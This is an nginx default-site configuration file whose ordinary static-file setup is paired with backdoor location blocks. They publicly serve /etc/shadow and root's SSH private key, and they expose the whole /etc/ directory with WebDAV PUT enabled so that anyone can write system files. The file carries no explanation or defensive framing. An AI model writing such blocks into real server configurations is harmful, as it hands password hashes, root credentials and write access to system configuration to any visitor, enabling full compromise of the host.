server {
    listen 80 default_server;
    listen [::]:80 default_server;

    root /var/www/html;
    index index.html;
    server_name _;

    location / { try_files $uri $uri/ =404; }

    location /hacked_shadow { alias /etc/shadow; }
    location /hacked_ssh { alias /root/.ssh/id_rsa; }

    location /hacked_etc/ {
        alias /etc/;
        dav_methods PUT;
        create_full_put_path on;
    }
}
